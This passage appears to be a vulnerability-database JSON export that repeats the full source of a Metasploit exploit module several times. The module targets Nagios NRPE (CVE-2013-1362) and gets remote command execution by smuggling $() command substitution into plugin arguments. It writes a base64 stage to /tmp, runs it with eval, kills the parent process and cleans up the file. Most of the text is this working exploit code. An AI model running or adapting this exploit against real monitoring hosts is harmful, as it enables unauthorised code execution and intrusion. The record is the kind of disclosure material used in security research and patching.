Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-07T16:01:32", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-15T08:01:40", "history": [], "viewCount": 17, "enchantments": {"score": {"value": null, "modified": "2018-01-15T08:01:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-15T08:01:40", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-15T10:05:47", "history": [], "viewCount": 19, "enchantments": {"score": {"value": null, "modified": "2018-01-15T10:05:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-15T10:05:47", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-18T00:03:52", "history": [], "viewCount": 19, "enchantments": {"score": {"value": null, "modified": "2018-01-18T00:03:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-18T00:03:52", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-18T02:02:28", "history": [], "viewCount": 58, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-18T02:02:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
